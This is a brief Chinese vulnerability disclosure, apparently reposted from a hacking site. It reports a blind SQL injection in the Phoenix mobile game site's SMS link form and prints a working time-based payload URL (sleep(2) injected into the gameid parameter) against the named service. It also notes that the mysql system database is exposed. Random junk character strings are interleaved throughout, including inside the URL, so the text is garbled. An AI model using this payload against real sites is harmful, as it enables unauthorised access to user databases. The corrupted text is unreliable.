简要描述:5 R+ H% E( P0 n$ L6 l
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
$ g0 V$ w4 w& `/ R
. e* ?' W; {, V, y4 K* ?! n3 g详细说明:$ Q; \0 \. i0 A% o. I( }) g
存在SQL盲注url:
L- {, A i ]3 D, @+ m$ e- ]fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
& | C/ y; s: j9 i) Bhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png* L6 n3 n: O) _7 p( U# m
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png: A6 P% w T/ Y2 s
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg" R5 ?; X3 T% z+ \& W
/ q' B& n& l4 W
能看到mysql系统数据库,看来user权限应该很高的。。 |